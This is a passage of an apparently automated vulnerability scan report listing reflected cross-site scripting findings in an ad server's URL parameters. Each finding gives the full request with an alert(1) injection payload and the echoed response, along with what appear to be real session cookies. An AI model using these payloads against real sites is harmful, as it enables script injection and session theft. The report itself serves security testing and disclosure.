GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=3a206'-alert(1)-'c65f39f1218&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:42 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='3a206'-alert(1)-'c65f39f1218';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
var majorcatid='10001';
var minorcatid='1';

// For Purchase
...[SNIP]...

4.72. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_ptime_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_ptime_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dba97'-alert(1)-'49efd703601 was submitted in the _RM_HTML_ptime_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=dba97'-alert(1)-'49efd703601&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:38 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38441
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='dba97'-alert(1)-'49efd703601';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
var majorcatid='10001';
var minorcatid='1';

...[SNIP]...

4.73. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_tixp_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_tixp_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0af1'-alert(1)-'f9277495374 was submitted in the _RM_HTML_tixp_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=b0af1'-alert(1)-'f9277495374&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:21 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
t_date='07/20/2011';
var event_time_zone='America/New_York';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='b0af1'-alert(1)-'f9277495374';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var art
...[SNIP]...

4.74. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_venue_name_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_venue_name_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f8ad'-alert(1)-'530dfc3a08e was submitted in the _RM_HTML_venue_name_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium9f8ad'-alert(1)-'530dfc3a08e&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:13 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38441
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
t_name='U2%20360%BA%20Tour';
var event_date='07/20/2011';
var event_time_zone='America/New_York';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium9f8ad'-alert(1)-'530dfc3a08e';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C5
...[SNIP]...

4.75. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_venueid_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_venueid_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bb01'-alert(1)-'67bf9ccb3cd was submitted in the _RM_HTML_venueid_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=12337bb01'-alert(1)-'67bf9ccb3cd&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38441
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...

var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='12337bb01'-alert(1)-'67bf9ccb3cd';
var artistid='1308249';
var majorcatid='10001';
var minorcatid='1';

// For Purchase Tracking
var b3_d = new Image (1,1);
var b3_e = new Image (1,1);
var b3_f = new Image (1,1);
var b3_g
...[SNIP]...

4.76. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_venuezip_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_venuezip_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a2ce'-alert(1)-'37855b65c24 was submitted in the _RM_HTML_venuezip_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=070733a2ce'-alert(1)-'37855b65c24&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:17 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
ur';
var event_date='07/20/2011';
var event_time_zone='America/New_York';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='070733a2ce'-alert(1)-'37855b65c24';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1
...[SNIP]...

4.77. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1627503762@x96 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/zzzSample/wwww.themig.com/1627503762@x96

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffcbb"><script>alert(1)</script>3da72bcef52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/zzzSampleffcbb"><script>alert(1)</script>3da72bcef52/wwww.themig.com/1627503762@x96?&XE&Page=HomeMedia%20Innovation%20Group%20-%20Contact%20Us&tax23_RefDocLoc=http://www.fakereferrerdominator.com/referrerPathName&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/contact.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D; session=1311100939|1311100939

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:43:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 344
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/zzzSampleffcbb"><script>alert(1)</script>3da72bcef52/wwww.themig.com/149311977/x96/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.78. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1627503762@x96 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/zzzSample/wwww.themig.com/1627503762@x96

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f185"><script>alert(1)</script>c015f41fa84 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/zzzSample/wwww.themig.com9f185"><script>alert(1)</script>c015f41fa84/1627503762@x96?&XE&Page=HomeMedia%20Innovation%20Group%20-%20Contact%20Us&tax23_RefDocLoc=http://www.fakereferrerdominator.com/referrerPathName&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/contact.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D; session=1311100939|1311100939

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:43:25 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/zzzSample/wwww.themig.com9f185"><script>alert(1)</script>c015f41fa84/1805526034/x96/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.79. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1627503762@x96 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/zzzSample/wwww.themig.com/1627503762@x96

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a0e6"><script>alert(1)</script>9ef75515961 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/zzzSample/wwww.themig.com/1627503762@x968a0e6"><script>alert(1)</script>9ef75515961?&XE&Page=HomeMedia%20Innovation%20Group%20-%20Contact%20Us&tax23_RefDocLoc=http://www.fakereferrerdominator.com/referrerPathName&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/contact.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D; session=1311100939|1311100939

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:43:27 GMT
Server: Apache/2.2.3 (Red Hat)
